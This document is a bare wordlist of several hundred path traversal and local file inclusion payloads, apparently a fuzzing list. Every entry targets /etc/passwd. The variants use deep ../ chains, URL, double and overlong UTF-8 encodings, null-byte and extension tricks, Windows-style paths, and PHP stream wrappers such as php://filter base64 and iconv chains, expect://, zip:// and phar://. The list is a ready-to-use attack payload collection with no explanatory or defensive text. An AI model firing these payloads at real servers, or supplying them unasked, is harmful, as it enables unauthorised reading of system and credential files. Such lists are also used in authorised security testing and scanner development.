/etc/passwd
./etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
/etc/passwd
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../../../../../etc/passwd
/../../../../../../../etc/passwd
/../../../../../../../../etc/passwd
/../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../etc/passwd
..//etc/passwd
....//etc/passwd
..../etc/passwd
....\/etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
..//////..//..//etc/passwd
..\/..\/etc/passwd
..\/..\/..\/etc/passwd
..\/..\/..\/..\/etc/passwd
..\/..\/..\/..\/..\/etc/passwd
..//..//..//etc/passwd
../..//..///../..//etc/passwd
..\etc/passwd
..\..\etc/passwd
..\..\..\etc/passwd
..\..\..\..\etc/passwd
..\..\..\..\..\etc/passwd
..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd
..\/../etc/passwd
../../..\..\/etc/passwd
..\/../../etc/passwd
..\/..\/../etc/passwd
%2e%2e/etc/passwd
%2e%2e%2fetc/passwd
%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%5cetc/passwd
%2e%2e%5c%2e%2e%5cetc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
%2e%2e/etc/passwd
..%2fetc/passwd
%2e./etc/passwd
.%2e/etc/passwd
../%65tc/passwd
../etc%2fpasswd
%2e%2e%2f%65tc/passwd
%252e%252e/etc/passwd
%252e%252e%252fetc/passwd
%252e%252e/%252e%252e/etc/passwd
%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%255cetc/passwd
%252e%252e%255c%252e%252e%255cetc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd
%c0%2eetc/passwd
%c0%2e%c0%2e/etc/passwd
%c0%2e%c0%2e%c0%2fetc/passwd
%c0%2e%c0%2e/%c0%2e%c0%2e/etc/passwd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc/passwd
%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%e0%80%ae%e0%80%ae/etc/passwd
%e0%80%ae%e0%80%ae%e0%80%afetc/passwd
%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/passwd
%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
../%2e%2e/%2e%2e/etc/passwd
%2e%2e/../../etc/passwd
..%2f..%2f../etc/passwd
%2e%2e%5c%2e%2e/etc/passwd
..%5c%2e%2e%2fetc/passwd
%252e./.%252e/etc/passwd
.%252e/.%2e/etc/passwd
%2e%252e/%2e./etc/passwd
..%252f..%2f../etc/passwd
%25%32%65%25%32%65%25%32%66etc/passwd
%25%32%65%25%32%65/etc/passwd
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../etc/passwd%00.jpg
../../etc/passwd%00.png
../../../etc/passwd%00.pdf
../../../../etc/passwd%00.html
../../../../../etc/passwd%00.php
../etc/passwd%2500
../../etc/passwd%2500
../../../etc/passwd%2500
../etc/passwd%u0000
../../etc/passwd%u0000
../../../etc/passwd%u0000
../etc/passwd............................................................
../../etc/passwd...........................................................
../../../etc/passwd........................................................
../etc/passwd/./././././././././././././././././././././././././././././.
../../etc/passwd/./././././././././././././././././././././././././././.
../etc/passwd/////////////////////////////////////////////////////////
../../etc/passwd//////////////////////////////////////////////////////
../etc/passwd/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=../etc/passwd
php://filter/convert.base64-encode/resource=../../etc/passwd
php://filter/convert.base64-encode/resource=../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../../../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../../../../../../../etc/passwd
php://filter/convert.base64-decode/resource=/etc/passwd
php://filter/convert.base64-decode/resource=../etc/passwd
php://filter/convert.base64-decode/resource=../../etc/passwd
php://filter/convert.base64-decode/resource=../../../etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
php://filter/read=string.rot13/resource=../etc/passwd
php://filter/read=string.rot13/resource=../../etc/passwd
php://filter/read=string.rot13/resource=../../../etc/passwd
php://filter/read=string.rot13/resource=../../../../etc/passwd
php://filter/read=string.rot13/resource=../../../../../etc/passwd
php://filter/read=string.rot13/resource=../../../../../../etc/passwd
php://filter/convert.iconv.utf-8.utf-7/resource=/etc/passwd
php://filter/convert.iconv.utf-8.utf-7/resource=../etc/passwd
php://filter/convert.iconv.utf-8.utf-7/resource=../../etc/passwd
php://filter/convert.iconv.utf-8.utf-7/resource=../../../etc/passwd
php://filter/convert.iconv.utf-8.utf-16/resource=/etc/passwd
php://filter/convert.iconv.utf-8.utf-16/resource=../etc/passwd
php://filter/convert.iconv.utf-8.utf-16/resource=../../etc/passwd
php://filter/convert.iconv.ISO-8859-1.UTF-8/resource=/etc/passwd
php://filter/convert.iconv.ISO-8859-1.UTF-8/resource=../etc/passwd
php://filter/convert.base64-encode|convert.base64-decode/resource=/etc/passwd
php://filter/convert.base64-encode|convert.base64-decode/resource=../etc/passwd
php://filter/read=string.rot13|string.rot13/resource=/etc/passwd
php://filter/read=string.rot13|string.rot13/resource=../etc/passwd
php://filter/convert.iconv.utf-8.utf-7|convert.base64-encode/resource=/etc/passwd
php://filter/convert.iconv.utf-8.utf-7|convert.base64-encode/resource=../etc/passwd
php://filter/convert.base64-encode|convert.iconv.utf-8.utf-7|convert.base64-decode/resource=/etc/passwd
php://filter/string.toupper|string.tolower|string.rot13/resource=/etc/passwd
php://filter/string.strip_tags|convert.base64-encode/resource=../etc/passwd
PHP://filter/convert.base64-encode/resource=/etc/passwd
Php://filter/convert.base64-encode/resource=../etc/passwd
pHP://filter/convert.base64-encode/resource=../../etc/passwd
php://FILTER/convert.base64-encode/resource=/etc/passwd
php://Filter/convert.base64-encode/resource=../etc/passwd
php://filter/CONVERT.base64-encode/resource=/etc/passwd
php://filter/Convert.Base64-Encode/resource=/etc/passwd
pHp://FiLtEr/CoNvErT.bAsE64-EnCoDe/resource=/etc/passwd
php://input
php://stdin
php://stdout
php://stderr
php://memory
php://temp
data://text/plain;base64,/etc/passwd
data://text/plain,/etc/passwd
data:text/plain;base64,/etc/passwd
data:text/plain,/etc/passwd
expect:///etc/passwd
expect://../etc/passwd
expect://../../etc/passwd
expect://../../../etc/passwd
zip:///etc/passwd
zip://../etc/passwd
zip://../../etc/passwd
zip://../../../etc/passwd
zip://passwd.zip#/etc/passwd
zip://../passwd.zip#/etc/passwd
zip://../../passwd.zip#/etc/passwd
phar:///etc/passwd
phar://../etc/passwd
phar://../../etc/passwd
phar://../../../etc/passwd
phar://passwd.phar//etc/passwd
phar://../passwd.phar//etc/passwd
phar://../../passwd.phar//etc/passwd
glob:///etc/passwd
glob://../etc/passwd
glob://../../etc/passwd
glob://*/etc/passwd
glob://../*/etc/passwd
../?/../etc/passwd
../../?/../../etc/passwd
../?/..?/etc/passwd
../??/../etc/passwd
../#/../etc/passwd
../../#/../../etc/passwd
/etc/passwd
/tmp/etc/passwd
/var/etc/passwd
/var/www/etc/passwd
/var/www/html/etc/passwd
/usr/local/etc/passwd
/usr/share/etc/passwd
/opt/etc/passwd
/home/etc/passwd
/root/etc/passwd
/srv/etc/passwd
/app/etc/passwd
/data/etc/passwd
/web/etc/passwd
/www/etc/passwd
/public/etc/passwd
/public_html/etc/passwd
/html/etc/passwd
/htdocs/etc/passwd
C:\etc\passwd
C:\Windows\etc\passwd
C:\inetpub\etc\passwd
C:\inetpub\wwwroot\etc\passwd
C:\xampp\htdocs\etc\passwd
C:\wamp\www\etc\passwd
C:\Program Files\etc\passwd
D:\etc\passwd
E:\etc\passwd
\\etc\passwd
\etc\passwd
\\localhost\c$\etc\passwd
\\127.0.0.1\c$\etc\passwd
\\?\c:\etc\passwd
\\.\c:\etc\passwd
php://filter/resource=../etc/passwd
php://filter/resource=../../etc/passwd
php://filter/resource=../../../etc/passwd
php://filter/read=string.rot13/resource=../../../../etc/passwd
php://filter/read=string.rot13/resource=../../../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../../../../etc/passwd
file:///etc/passwd
file://../etc/passwd
file://../../etc/passwd
file://../../../etc/passwd
file://../../../../etc/passwd
file://../../../../../etc/passwd
%70%68%70://filter/resource=/etc/passwd
%70%68%70://filter/resource=../etc/passwd
php%3A%2F%2Ffilter/resource=/etc/passwd
php%3A%2F%2Ffilter/resource=../etc/passwd
php://%66ilter/resource=/etc/passwd
php://filte%72/resource=/etc/passwd
php://filter/resourc%65=/etc/passwd
php://filter/re%73ource=../etc/passwd
../ /etc/passwd
../../ /etc/passwd
../%20/etc/passwd
../../%20/etc/passwd
../%09/etc/passwd
../../%09/etc/passwd
../%0a/etc/passwd
../../%0a/etc/passwd
../%0d/etc/passwd
%u002e%u002e/etc/passwd
%u002e%u002e%u002fetc/passwd
%uff0e%uff0e/etc/passwd
%uff0e%uff0e%uff0fetc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
..././..././etc/passwd
..././..././..././etc/passwd
..././..././..././..././etc/passwd
..........//etc/passwd
............//etc/passwd
.............//etc/passwd
/app/etc/passwd
/app/public/etc/passwd
/app/src/etc/passwd
/usr/src/app/etc/passwd
/usr/src/app/public/etc/passwd
/code/etc/passwd
/application/etc/passwd
/workspace/etc/passwd
/project/etc/passwd
....//etc/passwd
..../\etc/passwd
....\/etc/passwd
..../etc/passwd#
../../etc/passwd?
../../../etc/passwd#dummy
../../../../etc/passwd?dummy=1
/var/www/html/public/etc/passwd
/var/www/html/storage/etc/passwd
/var/www/html/uploads/etc/passwd
/usr/share/nginx/html/etc/passwd
/var/www/symfony/public/etc/passwd
/var/www/laravel/storage/app/etc/passwd
/var/www/laravel/public/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://filter/zlib.inflate/convert.base64-decode/resource=/etc/passwd
php://filter/bzip2.compress/convert.base64-encode/resource=/etc/passwd
php://filter/bzip2.decompress/convert.base64-decode/resource=/etc/passwd
php://filter/convert.quoted-printable-encode/resource=/etc/passwd
php://filter/convert.quoted-printable-decode/resource=/etc/passwd
php://filter/string.strip_tags/resource=/etc/passwd
php://filter/string.toupper/resource=/etc/passwd
php://filter/string.tolower/resource=/etc/passwd
php://filter/convert.iconv.utf-8.utf-16le/resource=/etc/passwd
php://filter/convert.iconv.utf-8.utf-32le/resource=/etc/passwd
php://filter/convert.iconv.utf-16le.utf-8/resource=/etc/passwd
php://filter/convert.iconv.ISO-8859-1.UTF-7/resource=/etc/passwd
php://filter/convert.iconv.CP1252.UTF-8/resource=/etc/passwd
php://filter/convert.iconv.UCS-2.UTF-8/resource=/etc/passwd
php://filter/convert.iconv.UCS-4.UTF-8/resource=/etc/passwd
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd
php://filter/convert.base64-encode|convert.base64-encode|convert.base64-decode/resource=/etc/passwd
php://filter/read=convert.base64-encode|convert.base64-encode|convert.base64-decode|convert.base64-decode/resource=/etc/passwd
file:///etc/passwd
file:///./etc/passwd
file:///../etc/passwd
file:///../../etc/passwd
file:///../../../etc/passwd
file:///../../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
..%c0%afetc/passwd
..%ef%bc%8fetc/passwd
..%c1%9cetc/passwd
%00../etc/passwd
%00../../etc/passwd
%00../../../etc/passwd
%00../../../../etc/passwd
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66etc/passwd
%2525%32%65%2525%32%65%2525%32%66etc/passwd
php://filter/resource=%2e%2e%2fetc/passwd
php://filter/resource=%2e%2e%2f%2e%2e%2fetc/passwd
php://filter/convert.base64-encode/resource=%2e%2e%2fetc/passwd
php://filter/convert.base64-encode/resource=%2e%2e%2f%2e%2e%2fetc/passwd
../Etc/passwd
../ETC/PASSWD
../../Etc/passwd
../../ETC/PASSWD
../../../Etc/passwd
../EtC/passwd
../ETC/passwd
../../EtC/PASSWD
/etc/passwd:$DATA
../etc/passwd:$DATA
../../etc/passwd:$DATA
../../../etc/passwd:$DATA
/etc/passwd::$DATA
../etc/passwd::$DATA
../etc/passwd?
../../etc/passwd?
../../../etc/passwd?
../etc/passwd?.jpg
../../etc/passwd?.png
../../../etc/passwd?.php
../etc/passwd%0a
../../etc/passwd%0a
../etc/passwd%0d
../../etc/passwd%0d
../etc/passwd%0d%0a
../../etc/passwd%0d%0a
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
./././etc/passwd
././././etc/passwd
././././././etc/passwd
../../././etc/passwd
../../../././etc/passwd
php://filter/write=string.rot13/resource=/etc/passwd
php://filter/write=convert.base64-decode/resource=/etc/passwd
php://filter/write=string.strip_tags/resource=/etc/passwd
%252e%252e%255c%252e%252e%255cetc/passwd
....\/....\/....\/etc/passwd
php://filter/convert.iconv.UTF-8.CSISO2022KR/resource=../etc/passwd
php://filter/convert.base64-encode/resource=%2e%2e%2f%2e%2e%2fetc/passwd
%70%68%70://filter/convert.base64-encode/resource=%2e%2e%2fetc/passwd
